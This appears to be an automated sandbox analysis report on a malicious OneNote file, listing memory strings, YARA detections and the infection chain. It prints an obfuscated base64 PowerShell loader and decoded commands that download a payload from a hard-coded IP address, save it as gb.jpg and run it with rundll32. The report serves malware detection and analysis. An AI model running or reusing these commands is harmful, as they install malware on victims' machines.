Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://invites.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://lifecycle.office.com
Source: de-ch[1].htm.16.dr String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://login.windows.local
Source: App_1675800120151438600_11E4938C-2561-4ECF-9AE1-F6A34EF41A76.log.0.dr String found in binary or memory: https://login.windows.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://make.powerautomate.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://management.azure.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://management.azure.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://messaging.action.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://messaging.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://officeapps.live.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://onedrive.live.com
Source: de-ch[1].htm.16.dr String found in binary or memory: https://onedrive.live.com/about/de-ch/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: de-ch[1].htm.16.dr String found in binary or memory: https://outlook.live.com/owa/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://outlook.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://outlook.office.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://outlook.office365.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://pushchannel.1drv.ms
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://res.cdn.office.net/polymer/models
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: de-ch[1].htm.16.dr String found in binary or memory: https://schema.org
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://settings.outlook.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://staging.cortana.ai
Source: de-ch[1].htm.16.dr String found in binary or memory: https://start.microsoftapp.net/start?pc_campaign=UHF_Banner_15mkts&amp;adjust=y9xgnyl_5sblqid&quot;
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://tasks.office.com
Source: de-ch[1].htm.16.dr String found in binary or memory: https://twitter.com/microsoft_ch
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: de-ch[1].htm.16.dr String found in binary or memory: https://www.instagram.com/microsoftch/
Source: de-ch[1].htm.16.dr String found in binary or memory: https://www.linkedin.com/company/1035
Source: 1E906F6A-A954-476D-9938-3DC6D5700ACA.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: de-ch[1].htm.16.dr String found in binary or memory: https://www.onenote.com/?omkt=de-CH
Source: de-ch[1].htm.16.dr String found in binary or memory: https://www.skype.com/de/
Source: de-ch[1].htm.16.dr String found in binary or memory: https://www.xbox.com/
Source: de-ch[1].htm.16.dr String found in binary or memory: https://www.youtube.com/user/MicrosoftCH
Source: global traffic HTTP traffic detected: GET /38199.dat HTTP/1.1Host: 87.236.146.31Connection: Keep-Alive

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\gb.jpg Jump to dropped file
Yara signature match
Source: 00000009.00000002.2654006199.0000021A0CABF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 7132, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\Public\1.cmd, type: DROPPED Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_100194D0 15_2_100194D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1001799F 15_2_1001799F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_100175E0 15_2_100175E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_10015207 15_2_10015207
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_10003EEA 15_2_10003EEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_10013BFA 15_2_10013BFA
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000A4A8 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,KiUserCallbackDispatcher,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose, 15_2_1000A4A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000AA02 KiUserCallbackDispatcher,Wow64GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory, 15_2_1000AA02
PE file contains executable resources (Code or Archives)
Source: e77242d6.dll.15.dr Static PE information: Resource name: RT_MESSAGETABLE type: a.out little-endian 32-bit pure executable not stripped
PE file does not import any functions
Source: e77242d6.dll.15.dr Static PE information: No import functions for PE file found
Source: gb.jpg.13.dr Static PE information: No import functions for PE file found
Tries to load missing DLLs
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE Section loaded: edgegdi.dll Jump to behavior
PE file overlay found
Source: gb.jpg.13.dr Static PE information: Data appended to the last section found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Funds_160151.one
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsr
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Open.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe
Source: unknown Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE "C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE" /tsr
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Process created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsr Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg==')) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\1.cmd nd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg'); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe Jump to behavior
Source: Send to OneNote.lnk.0.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE File created: C:\Users\user\Documents\{DDFA7D8F-AF99-4101-A7C8-1702B1E94F6B} Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE File created: C:\Users\user\AppData\Local\Temp\{11E4938C-2561-4ECF-9AE1-F6A34EF41A76} - OProcSessId.dat Jump to behavior
Source: e77242d6.dll.15.dr Binary string: \Device\IPT[
Source: classification engine Classification label: mal100.troj.expl.evad.winONE@19/732@0/2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000D972 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 15_2_1000D972
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE File read: C:\Program Files\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_100011EB CreateBitmapIndirect,CreateBrushIndirect,CreateDIBPatternBrush,CreateDIBPatternBrushPt,CreateDIBSection,CreateEllipticRgn,CreateEllipticRgnIndirect,CreateEnhMetaFileA,CreateFontA,CreateFontIndirectExW,CreateHalftonePalette,CreateHatchBrush,CreatePatternBrush,CreatePenIndirect,CreateRectRgnIndirect,CreateRoundRectRgn,CreateScalableFontResourceA,CreateScalableFontResourceW,CreateSolidBrush,GdiGetBatchLimit,GdiTransparentBlt,WICMapGuidToShortName,WICMapSchemaToName,WICMapShortNameToGuid,AccessCheckAndAuditAlarmA,AccessCheckByTypeAndAuditAlarmA,AddAccessAllowedAce,AddAccessAllowedAceEx,AddAccessDeniedAce,AddAuditAccessObjectAce,BuildTrusteeWithSidA,ChangeServiceConfig2A,CloseTrace,ConvertToAutoInheritPrivateObjectSecurity,CreatePrivateObjectSecurity,EnumerateTraceGuidsEx,EqualDomainSid,EventActivityIdControl,EventWrite,EventWriteEx,EventWriteString,EventWriteTransfer,FindFirstFreeAce,GetEventLogInformation,GetAce, 15_2_100011EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_1000CD1E CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 15_2_1000CD1E
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Mutant created: \Sessions\1\BaseNamedObjects\{0C1FC4BB-18AC-4766-8E40-0FC71E4C8536}
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Mutant created: \Sessions\1\BaseNamedObjects\{513D75E9-431D-4895-9B46-EEFA6B9D38BA}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_03
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE Mutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{0C1FC4BB-18AC-4766-8E40-0FC71E4C8536}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common Jump to behavior
Source: Binary string: amstream.pdb source: backgroundTaskHost.exe, 00000010.00000003.2711489777.0000000004611000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: e77242d6.dll.15.dr
Source: Binary string: wntdll.pdb source: e77242d6.dll.15.dr
Source: Binary string: amstream.pdbGCTL source: backgroundTaskHost.exe, 00000010.00000003.2711489777.0000000004611000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg=='))
